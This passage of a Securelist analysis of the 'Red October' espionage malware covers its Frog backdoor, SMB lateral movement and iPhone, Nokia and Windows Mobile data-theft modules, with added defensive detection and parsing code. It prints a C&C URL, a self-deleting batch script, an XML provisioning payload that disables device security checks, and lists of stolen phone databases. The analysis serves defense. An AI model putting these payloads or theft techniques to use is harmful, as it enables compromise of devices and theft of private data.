After that, the module attempts to find %AppData%\adt.dat. Two variants are checked, common and user-specific, i.e.:

C:\Documents and Settings\All Users\Application Data
C:\Documents and Settings\username\Application Data

The "adt.dat" file is an encrypted INI file of known credentials of users in the current domain and attacked organization. When decrypted, this file looks like this:

[user]
login = "%User1%"
domain = "%Domain%"
password = "%Password2%"
admin = "1"
[user]
login = "%User2%"
domain = "%Domain%"
password = "%Password2%"
admin = "1"

This information is checked against the local domain controller to find active users with Admin privileges. A verified account is used for the optional functionality of establishing a NetBIOS connection with the remote host to change the remote registry. However, the only setting that is changed is the MapMenuConfigGrps value mentioned above. It is set to the local system proxy parameters which were acquired before.

The next procedure is to establish an SMB connection with %Target% and check whether the testsvc_00_name service is running. If it is, the module uses the Service Control Manager to stop the remote service. Then it copies the Frog backdoor file embedded in the AAA config/script to the remote path \\%Target%\ADMIN$\%SYSTEM%\testsvc_00.exe.

After that it starts the service using the Service Control Manager and checks whether the Frog backdoor started successfully by querying its status over the named pipe \\%Target%\pipe\net\NtControlListener or via a direct TCP connection on port 4444.
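The sequence just described (a file written to ADMIN$ over SMB with admin credentials, then a service created whose binary is that file, then the Frog pipe and port appearing on the target) is what a defender can look for on the receiving host. The detection below is an added example, not part of the report or of any product: the event records are constructed here to look like Windows Security events 5145 (detailed file share access) and 5154 (WFP permitted a listen), System event 7045 (service installed) and Sysmon event 17 (PipeCreated) after field extraction, with field names taken from those event schemas; the 120 second correlation window, the benign records and the svchost image for the pipe are assumptions. The service, file, pipe and port names come from this page.

```python
"""Correlate an ADMIN$ write with a subsequent service install, plus Frog host indicators.

Added example, not part of the report. Event dicts below are constructed to mimic
Windows Security 5145/5154, System 7045 and Sysmon 17 events after field extraction."""

WRITE_DATA = 0x2                       # AccessMask bit WriteData/AddFile in 5145 events

# Indicators from the DASvcInstall and Frog descriptions on this page.
KNOWN_SERVICE_NAMES = {"testsvc_00_name"}
KNOWN_FILE_NAMES = {"testsvc_00.exe"}
KNOWN_PIPE_SUFFIX = "\\net\\ntcontrollistener"
KNOWN_LISTEN_PORT = 4444


def _basename(path):
    """Last component of an ImagePath/RelativeTargetName, ignoring quotes and trailing arguments."""
    path = path.strip().strip('"')
    if '"' in path:                    # "C:\dir\svc.exe" -k args -> cut at the closing quote
        path = path.split('"', 1)[0]
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    cut = name.lower().find(".exe")    # unquoted "svc.exe -k args" (assumption: .exe binaries)
    return (name[:cut + 4] if cut != -1 else name).lower()


def correlate_remote_service_install(events, window_seconds=120):
    """Pair each write to ADMIN$ (5145 with WriteData) with a later 7045 whose ImagePath
    basename equals the written file. One alert per pair; ordinary share traffic and
    locally installed services produce nothing."""
    alerts, pending_writes = [], []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 5145 and ev["ShareName"].upper().endswith("ADMIN$") \
                and ev["AccessMask"] & WRITE_DATA:
            pending_writes.append(ev)
        elif ev["id"] == 7045:
            image = _basename(ev["ImagePath"])
            for w in pending_writes:
                if _basename(w["RelativeTargetName"]) == image \
                        and 0 <= ev["ts"] - w["ts"] <= window_seconds:
                    alerts.append({
                        "rule": "remote_service_install_via_admin_share",
                        "source_ip": w["IpAddress"],
                        "account": w["SubjectUserName"],
                        "service": ev["ServiceName"],
                        "image": ev["ImagePath"],
                        "known_red_october_name": ev["ServiceName"].lower() in KNOWN_SERVICE_NAMES
                                                  or image in KNOWN_FILE_NAMES,
                    })
    return alerts


def match_frog_indicators(events):
    """Host-side Frog indicators: its control pipe and its listening TCP port."""
    hits = []
    for ev in events:
        if ev["id"] == 17 and ev["PipeName"].lower().endswith(KNOWN_PIPE_SUFFIX):
            hits.append(("pipe", ev["Image"], ev["PipeName"]))
        elif ev["id"] == 5154 and ev["SourcePort"] == KNOWN_LISTEN_PORT:
            hits.append(("listen", ev["Application"], ev["SourcePort"]))
    return hits


# Constructed sample: one DASvcInstall-style intrusion followed by two benign records.
SAMPLE_EVENTS = [
    {"ts": 1000, "id": 4624, "LogonType": 3, "IpAddress": "10.0.0.5", "TargetUserName": "backup_adm"},
    {"ts": 1002, "id": 5145, "IpAddress": "10.0.0.5", "SubjectUserName": "backup_adm",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"system32\testsvc_00.exe", "AccessMask": 0x12019F},
    {"ts": 1005, "id": 7045, "ServiceName": "testsvc_00_name",
     "ImagePath": r"C:\WINDOWS\system32\testsvc_00.exe", "StartType": "demand start"},
    {"ts": 1006, "id": 17, "Image": r"C:\WINDOWS\system32\svchost.exe", "PipeName": r"\net\NtControlListener"},
    {"ts": 1007, "id": 5154, "Application": r"\device\harddiskvolume1\windows\system32\svchost.exe",
     "SourcePort": 4444},
    {"ts": 4000, "id": 5145, "IpAddress": "10.0.0.9", "SubjectUserName": "deploy",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"Temp\agent.msi", "AccessMask": 0x2},
    {"ts": 9000, "id": 7045, "ServiceName": "VendorUpdater",
     "ImagePath": r'"C:\Program Files\Vendor\updater.exe" -service', "StartType": "auto start"},
]

if __name__ == "__main__":
    for alert in correlate_remote_service_install(SAMPLE_EVENTS):
        print(alert)
    print(match_frog_indicators(SAMPLE_EVENTS))
```

The correlation rule does not depend on the Red October names at all; those only set the known_red_october_name flag. Any tool that installs a service by copying a binary into ADMIN$ (PsExec-style remote execution, for example) trips the same rule, which is the point: the technique is generic, and the report's specific indicators should be layered on top of it rather than relied upon alone.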

The current module has some extra features that are not used according to the embedded config. In addition to the function called task_da_svcinstall it has 3 others:

task_da_svcuninstall – to remove the installed Frog service and its file;
task_da_svcstatus – to check the remote Frog service status via the Service Control Manager;
task_da_rem_proxy – to transfer the current proxy preferences to the remote host.

This module doesn't change the local registry, nor does it create any local files.

After completing the remote attack, the module sends logs to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description

D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

Frog module

Known variants:

MD5 Compilation date

595e29a21ecaa4dfcb3a5db18401a9a8 2012.05.28 08:56:10 (GMT)

Summary

The file is a PE DLL file with two exported functions (ServiceMain and WinMessage), compiled with Microsoft Visual Studio 2010.

This module is used to backdoor the current computer and is used in a pair with the remote exploit modules (i.e. ms_exploit). It is capable of running arbitrary executable code by saving a file coming from another local machine or a C&C and starting it as a new process (EXE), loading it from disk into memory as a DLL, or mapping it directly from memory and running it in "diskless" mode. It is designed to be a lightweight module which fits in 100Kb of data, doesn't create any logs and isn't linked with any external libraries.

DllMain

When loaded, the module retrieves its resource of type "BBB" and name "AAA". It decrypts the resource and parses the config parameters. Unlike most other modules, the config parameters of this module have a different format: it is not a script-like config but a plain binary structure with integer and string values.

ServiceMain

If the current module is started by the system during Windows boot as a service, the ServiceMain function is called by the system. The code in the function fetches the registry value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\epvsvcs\AuthCapabilitis; if this value is not set, it is set right away. The value is a 20-byte binary hash of system-dependent information (i.e. username, hostname). It is used as the system ID.

After that the module creates three independent threads:

NamedPipeThread (server mode)
This thread creates a named pipe \\.\pipe\net\NtControlListener (pipe name defined in the "AAA" config) and waits for incoming connections.

TCPThread (server mode)
This thread opens a listening TCP port 4444 (port number defined in the "AAA" config) and waits for incoming connections.

CnCThread (client mode)
This thread sends requests to the C&C server URL http://www.new-driver-upgrade.com/cgi-bin/frog (defined in the "AAA" config) containing current system information, including the current user name, computer name, local IP address, domain name, system ID and more, and gets and interprets a response.

While NamedPipeThread and TCPThread work in server mode, meaning they wait for incoming client connections and requests, the last thread, CnCThread, actively connects to the C&C, uploads current system information and expects a response. The logic of processing transmitted data is similar for all threads. They can either send out data about the current system or receive and run an executable module. There are three variants of executables that these threads can handle:

EXE
The received module is stored on disk as %TEMP%\system32uid.%Current Date and Time XORed with 0xA4F2%.tmp and started in a separate process with the CreateProcess API.

DLL
The received module is stored on disk as %TEMP%\system32uid.%Current Date and Time XORed with 0xA4F2%.tmp and loaded into the current process with the LoadLibrary API.

PE-IN-MEMORY
The received module is kept in the memory of the current process using the module's own PE file loader.

WinMessage function

This function combines the DllMain and ServiceMain functions, excluding the service control manager routines.

This module changes the local registry and sets the current system ID, as described above; it is also capable of creating local files. It doesn't make any local reports, nor does it send execution logs to the C&C server. The only information sent to the C&C server is general system info during the first stage of receiving and executing an additional payload.

“Red October”. Detailed Malware Description 5. Second Stage of Attack - Securelist
Source: http://www.securelist.com/en/analysis/204792272/Red_October_Detailed_Malware_Description_5_Second_Stage_of_Attack

“Red October”. Detailed Malware Description 5. Second Stage of Attack

First stage of attack
1. Exploits
2. Dropper
3. Loader Module
4. Main component

Second stage of attack
1. Modules, general overview
2. Recon group
3. Password group
4. Email group
5. USB drive group
6. Keyboard group
7. Persistence group
8. Spreading group
9. Mobile group
10. Exfiltration group

9. Mobile group

iPhone module

Known file location: %PROGRAMFILES%\Windows NT\iTunesNotifSrv.exe

Known variants:

MD5 Compilation date (encrypted) Compilation date (payload)

ee2e21a45a018c6faa68332a32c65ddd 2011.11.04 12:30:41 (GMT) 2011.11.04 10:19:11 (GMT)

339b8bc0f6e5ee4ca2bc2109f5de0b38 2011.11.21 12:07:46 (GMT) 2011.11.21 08:20:01 (GMT)

76e1d54a890befed31a369ce40b44ee6 2011.11.21 12:06:49 (GMT) 2011.11.21 08:20:01 (GMT)

The file is a PE EXE file, compiled with Microsoft Visual Studio 2010.

Summary

Creates an event named "sdjvkbasyfvbalvjklas".

Writes encrypted log files:

%TMP%\iTunes_notification_%p.dat
%TMP%\iTunes_ddsa_%p.tmp

where %p is derived from the result of the GetTickCount() API function.


Log files are encrypted with a custom encryption algorithm based on AMPRNG.

When started, the module writes the following registry value to be executed each time Windows starts:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunes Notification Service=%path to self%

Then, it locates the iTunes mobile device DLL and "CoreFoundation.dll" and resolves the following API functions:

AMDeviceNotificationSubscribe
AMRestoreRegisterForDeviceNotifications
AMDeviceConnect
AMDeviceIsPaired
AMDeviceValidatePairing
AMDeviceStartSession
AMDeviceStartService
AFCConnectionOpen
AFCConnectionClose
AMDeviceCopyValue
AFCDirectoryOpen
AFCDirectoryRead
AFCDirectoryClose
AFCFileInfoOpen
AFCKeyValueRead
AFCKeyValueClose
AFCFileRefOpen
AFCFileRefRead
AFCFileRefWrite
AFCFileRefClose
AMDeviceDisconnect
__CFStringMakeConstantString

If this succeeds, the module calls AMDeviceNotificationSubscribe to set up its own callback for iOS device connection/disconnection events.

In the device notification callback function, the module logs each connection and disconnection event. When a device is connected, it starts a new thread that manipulates this device.

Device connection thread

The module establishes a connection to the device using AMDeviceConnect, AMDeviceIsPaired, AMDeviceValidatePairing and finally AMDeviceStartSession.

Then, it starts the following services on the device: "com.apple.afc2", "com.apple.afc".

The service "com.apple.afc2" is usually present only when the device has been jailbroken, so the module sets a special flag if the service was started successfully.

Then, it opens an Apple File Connection via the started service using AFCConnectionOpen.

The module reads device settings using AMDeviceCopyValue. The following settings are referenced by name:

UniqueDeviceID
DeviceClass
DeviceName
ModelNumber
ProductType
ProductVersion
BuildVersion
SerialNumber
ActivationState
SIMStatus
InternationalMobileEquipmentIdentity
InternationalMobileSubscriberIdentity
IntegratedCircuitCardIdentity
PhoneNumber
WiFiAddress
BluetoothAddress
TimeZone
FirmwareVersion
BasebandVersion
BasebandBootloaderVersion

Also, it traverses the whole directory tree and stores the complete file listing in the log.

Then, it checks whether the device is jailbroken by:

1. accessing the directory "/Applications" using AFCFileInfoOpen
2. checking whether the service "com.apple.afc2" was started

The results are written in the log file.

Then, it builds a complete directory listing, starting from the root directory or "/private/var" (sample ee2e21a45a018c6faa68332a32c65ddd only). It also searches for and retrieves all files with the following extensions:

.jpg .jpeg .txt .doc .docx .xls .xlsx .ppt .pptx .dot .dotx .odt .djvu .odts .reg .rtf .zip .rar .pdf .7z .wab .pab .vcf .ost .wav .mp4 .m4a .amr .log .cer .em .msg .arc .key .pgp .gpg

Also, it tries to retrieve the contents of the following files:

/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/private/var/mobile/Library/SMS/sms.db
/private/var/mobile/Library/CallHistory/call_history.db
/private/var/mobile/Library/Notes/notes.db
/private/var/mobile/Library/Caches/locationd/consolidated.db
/private/var/mobile/Library/Calendar/Calendar.sqlitedb
/private/var/mobile/Library/Voicemail/voicemail.db
/private/var/mobile/Library/Safari/History.plist
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000001.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000002.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000003.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000004.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000005.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000006.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000007.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000008.db
/private/var/mobile/Library/WebKit/Databases/https_m.mg.mail.yahoo.com_0/0000000000000009.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000001.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000002.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000003.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000004.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000005.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000006.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000007.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000008.db
/private/var/mobile/Library/WebKit/Databases/https_mail.google.com_0/0000000000000009.db

Collected information, including iOS device configuration variables, file listings and file contents, is written to the file "%TMP%\iTunes_ddsa_%p.tmp". This file is encrypted and compressed with Zlib.

Log file format

The log starts with the MAGIC number 0x5C63F935, then 0x14 bytes of 0xFF, a DWORD length of the header, the header data, then the log data.

The data consists of tagged records. The following tag values are known to us:

0x8002 Time/date

0x8004 SHA1 of MAC address, System Volume Serial Number, IE Product ID (the same is written in HKCU, HKLM\SOFTWARE\Microsoft\ADOSoftware32, "ProductID")

0x8005 Log ID / header

0x8006 Log data

Compressed directory log starts with magic 0x5C63F934.
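As an added example (not code from the report), the following Python parses a decrypted, decompressed log buffer with the layout just described and walks its tagged records; the per-record encoding (WORD tag, DWORD length, payload) and the sample buffer built by build_sample() are assumptions of this example, since the report names the tags but not how records are encoded.

```python
import struct

# Constants taken from the report: log magic, compressed directory-log magic,
# and the 0x14 bytes of 0xFF that follow the magic.
LOG_MAGIC = 0x5C63F935
DIR_LOG_MAGIC = 0x5C63F934
PAD_LEN = 0x14

# Tag values the report lists; any other tag is reported as unknown.
TAG_NAMES = {
    0x8002: "Time/date",
    0x8004: "SHA1 of MAC address, volume serial number, IE Product ID",
    0x8005: "Log ID / header",
    0x8006: "Log data",
}

# ASSUMPTION of this example: a record is a little-endian WORD tag followed by a
# DWORD payload length and the payload. The report names the tags, not their encoding.
RECORD_HDR = struct.Struct("<HI")


def iter_records(data: bytes):
    """Walk the tagged records in the log data, raising on a truncated record."""
    off = 0
    while off < len(data):
        if off + RECORD_HDR.size > len(data):
            raise ValueError("truncated record header at offset %d" % off)
        tag, length = RECORD_HDR.unpack_from(data, off)
        off += RECORD_HDR.size
        if off + length > len(data):
            raise ValueError("record 0x%04X claims %d bytes past end of data" % (tag, length))
        yield tag, TAG_NAMES.get(tag, "unknown"), data[off:off + length]
        off += length


def parse_log(buf: bytes) -> dict:
    """Parse a buffer laid out as the report describes: DWORD magic, 0x14 bytes of
    0xFF, DWORD header length, header data, then log data. The on-disk file is
    encrypted and Zlib-compressed; this expects the decrypted, decompressed bytes."""
    prefix_len = 4 + PAD_LEN + 4
    if len(buf) < prefix_len:
        raise ValueError("buffer too short for magic, padding and header length")
    magic = struct.unpack_from("<I", buf, 0)[0]
    if magic == LOG_MAGIC:
        kind = "log"
    elif magic == DIR_LOG_MAGIC:
        kind = "directory log"
    else:
        raise ValueError("unknown magic 0x%08X" % magic)
    if buf[4:4 + PAD_LEN] != b"\xFF" * PAD_LEN:
        raise ValueError("expected 0x14 bytes of 0xFF after the magic")
    hdr_len = struct.unpack_from("<I", buf, 4 + PAD_LEN)[0]
    if prefix_len + hdr_len > len(buf):
        raise ValueError("header length %d exceeds buffer" % hdr_len)
    header = buf[prefix_len:prefix_len + hdr_len]
    records = list(iter_records(buf[prefix_len + hdr_len:]))
    return {"kind": kind, "header": header, "records": records}


def is_log_file(buf: bytes) -> bool:
    """Triage check for forensic sweeps: does the buffer parse as one of the two log kinds?"""
    try:
        parse_log(buf)
        return True
    except ValueError:
        return False


def build_sample() -> bytes:
    """Construct a sample log (not a real capture) using the assumed record layout."""
    def rec(tag, payload):
        return RECORD_HDR.pack(tag, len(payload)) + payload
    header = b"constructed-header"
    body = (rec(0x8002, b"2011-11-02 11:42:09")
            + rec(0x8005, b"LOG-1")
            + rec(0x8006, b"sample log data"))
    return (struct.pack("<I", LOG_MAGIC) + b"\xFF" * PAD_LEN
            + struct.pack("<I", len(header)) + header + body)


if __name__ == "__main__":
    for tag, name, payload in parse_log(build_sample())["records"]:
        print("0x%04X %-60s %r" % (tag, name, payload))
```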

Nokia module

Known variants

MD5 Compilation date

6ebcb0b7f9cca7cecebbd683685cb705 2011.11.02 11:42:09 (GMT)

Summary

PE Exe file compiled with Microsoft Visual C++ 2008.

Creates a log file with the name "%TMP%\adobe_upd_imhbfex_%p_%p.dat", where %p depends on the result of the GetTickCount() function.

It locates (via SOFTWARE\PC Connectivity Solution\API\) and loads the 'ConnAPI.dll' and 'DAAPI.dll' libraries (exits if unsuccessful, writing "ERROR LOADING ConnAPI.dll: '%d'" and "EXITING…" to the log), followed by the string "SUCCESS LOADING ConnAPI.dll:'%d'\n'" written to the log file together with a time stamp.

Note: each event written to the log file is followed by a time stamp, prepended by a string in the following format: [%04d-%02d-%02d %02d:%02d:%02d] (year-month-day hour-minute-second).

Writes to log "===========PROGRAM_STARTED_V_0.1=======" followed by time stamp.

Creates a mutex named "sysvolumecheckasdfg" and checks whether the program is already running. If so, it writes "PROGRAM IS ALREADY RUNNING - EXITING &" to the log and exits.

Creates registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup\%path_to_file%

It resolves the following API functions from ConnAPI.dll:

CONAAllocString
CONAAllocStringMB
CONAFreeString
CONAAllocMemory
CONAFreeMemory
CONAOpenDM
CONACloseDM
CONASetDeviceListOption
CONAGetDeviceCount
CONAGetDevices
CONAGetDevice
CONAFreeDeviceStructure
CONARefreshDeviceList
CONARenameFriendlyName
CONARegisterNotifyCallback
CONARegisterDMNotifyIF
CONASearchDevices
CONAFreeConnectionInfoStructures
CONAChangeDeviceTrustedState
CONAGetDeviceInfo
CONAFreeDeviceInfoStructure
CONAModemConfig
CONAFreeModemConfigData
CONAOpenFS
CONACloseFS
CONARegisterFSNotifyCallback
CONARegisterFSNotifyIF
CONARefreshDeviceMemoryValues
CONAGetMemoryTypes
CONAGetMemoryValues
CONASetCurrentFolder
CONAGetCurrentFolder
CONAFindBegin
CONAFindNextFolder
CONAFindNextFile
CONAFindEnd
CONACreateFolder
CONADeleteFolder
CONARenameFolder
CONAGetFolderInfo
CONAMoveFolder
CONACopyFolder
CONAGetFileInfo
CONADeleteFile
CONAMoveFile
CONACopyFile
CONARenameFile
CONAReadFile
CONAWriteFile
CONAReadFileInBlocks
CONAWriteFileInBlocks
CONACancel
CONAFreeFileInfoStructure
CONAFreeFolderInfoStructure
CONAFreeFolderContentStructure
CONAAllocFileDataMemory
CONAFreeFileDataMemory
CONAInstallApplication
CONAListApplications
CONAUninstallApplication
CONAFreeApplicationInfoStructures
CONAConvertFile
CONAGetConvertFileTypes
CONAFreeConvertFileTypes

It resolves the following API functions from DAAPI.dll:

CAGetAPIVersion
DAOpenCA
DACloseCA
CAGetFolderInfo
CAFreeFolderInfoStructure
CAGetIDList
CAFreeIdListStructure
CABeginOperation
CAReadItem
CAWriteItem
CADeleteItem
CAWriteField
CADeleteField
CACommitOperations
CAEndOperation
CAFreeItemData
CARegisterNotifyCallback
CARegisterOperationCallback

If this succeeds, the module calls the CONAOpenDM function, which opens the device management connection and returns a handle to the device management context. If that succeeds, the module calls CONARegisterNotifyCallback to register a callback function for device list notifications and writes "I AM WORKING..." to the log. If a device is connected, it starts a new thread to get information from the device.

The module uses the CONARefreshDeviceList, CONASetDeviceListOption, CONAGetDeviceCount, CONAGetDevices and CONAGetDevice API functions to obtain the device to be manipulated.

If a device was connected the module writes to log "!!!-------------- DEVICE ATTACHED: '%s'--------------- !!!".

It calls the GetDeviceInfo function to get the following information about the connected device: type, name, software version, used language, synchronization support. The module also gets information about device memory, device model, IMEI number and device file system. The obtained information is written to the log file.

Messages:

Extracts inbox, outbox, sent, archive messages, drafts, templates and SMS/MMS messages from the user's folders with statuses 'SENT', 'UNREAD', 'READ', 'DRAFT', 'PENDING', 'DELIVERED', 'SENDING', or with undefined status 'UNDEFINED MESSAGE_STATUS' or 'UNDEFINED FOLDER ID'. SMS and MMS messages are written separately to the log file.

Calendar:

Extracts meetings, birthdays, memos, reminders, notes and 'To Do' lists with repetition attributes 'NONE', 'ILY' (I suppose it means 'DAILY' but the authors must have mistyped), 'WEEKLY', 'MONTHLY', 'YEARLY' or 'Unknown'; with priority attributes 'HIGH', 'NORMAL', 'LOW' or 'Unknown'; with action attributes 'NEEDS_ACTION', 'COMPLETED' or 'Unknown'; with alarm attributes 'NOT_SET', 'SILENT', 'WITH_TONE' or 'UNKNOWN'; with starting/ending time, subject, location and status. The module writes everything to the log file.

Contacts:

Extracts all contacts with the following fields: ME, FROMAL_NAME, MIDDLE_NAME, ST_NAME, TITLE, SUFFIX, COMPANY, JOB_TITLE, BIRTHDAY, NICKNAME, GENERAL_NUMBER, HOME_NUMBER, WORK_NUMBER, PREF_NUMBER, R_NUMBER, GER_NUMBER, MOBILE_NUMBER, MOBILE_HOME_NUMBER, MOBILE_WORK_NUMBER, X_NUMBER, X_HOME_NUMBER, X_WORK_NUMBER, VIDEO_CALL_NUMBER, VOIP_NUMBER, VOIP_HOME_NUMBER, VOIP_WORK_NUMBER, POSTAL_ADRESS, BUSINESS_POSTAL_ADRESS,

HOME_POSTAL_ADRESS, EMAIL_ADRESS, HOME_EMAIL_ADRESS, WORK_EMAIL_ADRESS, WEB_ADRESS, HOME_WEB_ADRESS, WORK_WEB_ADRESS, PTT_ADRESS, VIDEO_ADRESS, SWISS_ADRESS. The module writes everything to the log file.

Applications:

Retrieves information about applications already installed on the device. Also monitors whether the user installs/uninstalls any SIS/SISX/J2ME application. The module writes everything to the log file.

File types:

Looks for files from the root directory (txt, cdb, doc, docx, xls, xlsx, ppt, pptx, dot, dotx, odt, djvu, odts, reg, rtf, zip, rar, pdf, 7z, wab, pab, vcf, ost, jpg, waw, mp4, m4a, amr, exe, log, cer, eml, msg, arc, key, pgp, gpg) and tries to retrieve them.

Modules for Windows Mobile

Windows files

Known files

MD5 Compilation date (encrypted)

70bee4d4141e6d963aa72a0da08b6683 11:14:22, July 8, 2011

09b4f1e0c03d7dbdac402df4c0625167 15:52:36, October 19, 2010

70bee4d4141e6d963aa72a0da08b6683 (724992 bytes)

PE Exe file compiled with Microsoft Visual C++ 2005.

Creates a log file at the path '%%TMP%%\tmp_m.%p.%p.dat', where all information about the module's work is written, and writes 'Application starting, version 2.0.0.2, obj: %s'. The module uses the same time/date format as the Nokia module ('year-month-date hours-minutes-seconds') after every new log entry.

Creates mutex "dfgber7t8234ytfndfugh5vndfuvh4".

Initializes RAPI.dll and resolves the following API functions:

CeSHCreateShortcut
CeGetSpecialFolderPath
CeFindClose
CeFindFirstFile
CeRegEnumKeyEx
CeRegEnumValue
CeWriteFile
CeCreateFile
CeReadFile
CeCreateProcess
CeCloseHandle
CeDeleteFile
CeGetLastError
CeRegQueryValueEx
CeRegCloseKey
CeRegCreateKeyEx
CeRegSetValueEx
CeRegOpenKeyEx
CeRapiUninit
CeRapiInitEx
CeRapiInit

After that it checks the ActiveSync version and writes information to a log file.

Creates event 'dfjsbnegisfgsafgdsgcxrte'.

Deletes the 'ActiveSync Connection Service' value in 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run'. If the module wasn't able to delete this value, it creates a 'delex.bat' file in the TMP folder:

:Repeat
del 'path_to_itself'
if exist 'path_to_itself' goto Repeat
del "C:\DOCUME~1\'USER_NAME'\LOCALS~1\Temp\delex.bat"

And after that launches it.

Windows Mobile device thread

The module uses the WaitForSingleObject API function and waits for a device to be connected. If a device is connected, it writes 'Device connected' to the log file and calls a subroutine which initializes a connection and gets information such as the device's name, OS version and CLSID, which is written to the log file.

The module also checks the associations (in the device's registry) between certain file types and the applications for these file types on the device and writes this information to the log file:

PDF (PDF viewer): pdf

WCELOAD (CAB file installer): cab

WMPLAYER (Windows Media Player): mp4, 3gp, amr, avi, wav, wma, wmv, asf, midi, aac, mp3d, mp3

IEXPLORE1 (Internet Explorer): res, wsp, file, https, ftp, http, url, ico, html, xml, xhtml, xsl

PPT (Pocket PowerPoint): ppt, pps, pptx, pptm, ppsx, ppsm

PIMG (Pocket image viewer): jfif, gif, png, bmp, jpg

PXL (Pocket Excel): pxl, pxt, xls, xlt, xlsx, xltx, xlsm, xltm

PWORD (Pocket Word): rtf, psw, dot, dotx, docx, docm, dotm, pwt, doc, txt

Working with Windows Mobile device

XML Provisioning

First the module tries to inject an XML provisioning document on a device.

Loads the provisioning doc on a device:

<wap-provisioningdoc>
  <characteristic type="SecurityPolicy">
    <parm name="4119" value="16"/>
    <parm name="4101" value="222"/>
    <parm name="4102" value="1"/>
    <parm name="4097" value="1"/>
    <parm name="4123" value="1"/>
    <parm name="4122" value="1"/>
  </characteristic>
</wap-provisioningdoc>

4119 - This setting grants the system administrative privileges held by SECROLE_MANAGER to other security roles. Value '16' is the User Authenticated role.

4101 - This setting indicates whether unsigned .cab files can be installed on the device. Value '222' indicates that only OEM, Operator, Manager, UserAuth, UserUnAuth and Operator-TPS can run unsigned .cab files.

4102 - This setting indicates whether unsigned applications are allowed to run on Windows Mobile devices. Value '1' indicates that unsigned applications are allowed to run on the device.

4097 - This setting restricts the access of remote applications that use the Remote API (RAPI) to implement ActiveSync operations on Windows Mobile devices. Value '1' indicates that full access to ActiveSync is provided: RAPI calls are processed without restrictions.

4123 - This setting specifies which security model is implemented on the device. Value '1' indicates that a one-tier security model is enabled. A device with one-tier access decides only whether an application should run, based on whether the application is signed with a certificate in the device certificate store. There is no concern with permission restriction.

4122 - This setting indicates whether a user is prompted to accept or reject unsigned .cab, theme, .dll and .exe files. Value '1' indicates the user will not be prompted.
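As an added, defender-side example (not code from the report), the following Python extracts the SecurityPolicy parameters from a wap-provisioningdoc and flags exactly the permissive values the report explains above; the function names and CONSTRUCTED_DOC are this example's own, and REPORT_DOC is the document quoted in the report.

```python
import xml.etree.ElementTree as ET

# SecurityPolicy parameter IDs and the values the report explains as permissive.
PERMISSIVE_VALUES = {
    "4119": ("16", "SECROLE_MANAGER privileges granted to the User Authenticated role"),
    "4101": ("222", "unsigned .cab files installable by OEM, Operator, Manager, "
                    "UserAuth, UserUnAuth and Operator-TPS"),
    "4102": ("1", "unsigned applications are allowed to run"),
    "4097": ("1", "full RAPI (ActiveSync) access, calls processed without restriction"),
    "4123": ("1", "one-tier security model, no permission restriction for signed code"),
    "4122": ("1", "no user prompt before unsigned .cab, theme, .dll and .exe files"),
}


def extract_security_policy(xml_text: str) -> dict:
    """Return {parm name: value} from every SecurityPolicy characteristic in the document."""
    root = ET.fromstring(xml_text)
    if root.tag != "wap-provisioningdoc":
        raise ValueError("not a wap-provisioningdoc (root is <%s>)" % root.tag)
    policy = {}
    for char in root.iter("characteristic"):
        if char.get("type") != "SecurityPolicy":
            continue
        for parm in char.findall("parm"):
            name, value = parm.get("name"), parm.get("value")
            if name is not None and value is not None:
                policy[name] = value
    return policy


def audit_security_policy(xml_text: str) -> list:
    """Flag each SecurityPolicy parm set to the permissive value the report describes.
    A parm with any other value is simply not flagged; that does not certify it as safe."""
    findings = []
    for name, value in extract_security_policy(xml_text).items():
        if name in PERMISSIVE_VALUES and value == PERMISSIVE_VALUES[name][0]:
            findings.append((name, value, PERMISSIVE_VALUES[name][1]))
    return sorted(findings)


# Provisioning document as quoted in the report.
REPORT_DOC = (
    '<wap-provisioningdoc> <characteristic type="SecurityPolicy"> '
    '<parm name="4119" value="16"/> <parm name="4101" value="222"/> '
    '<parm name="4102" value="1"/> <parm name="4097" value="1"/> '
    '<parm name="4123" value="1"/> <parm name="4122" value="1"/> '
    '</characteristic></wap-provisioningdoc>'
)

# Constructed contrast document (not from the report): two parms with non-permissive
# values plus an unrelated characteristic that the audit must ignore.
CONSTRUCTED_DOC = """<wap-provisioningdoc>
  <characteristic type="SecurityPolicy">
    <parm name="4102" value="0"/>
    <parm name="4122" value="0"/>
  </characteristic>
  <characteristic type="Registry">
    <parm name="unrelated" value="1"/>
  </characteristic>
</wap-provisioningdoc>"""

if __name__ == "__main__":
    for name, value, why in audit_security_policy(REPORT_DOC):
        print("parm %s = %s: %s" % (name, value, why))
```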

'Zakladka' and other modules injection

NB: all injected modules below are copied to '\Windows\' directory on a Windows Mobile device.

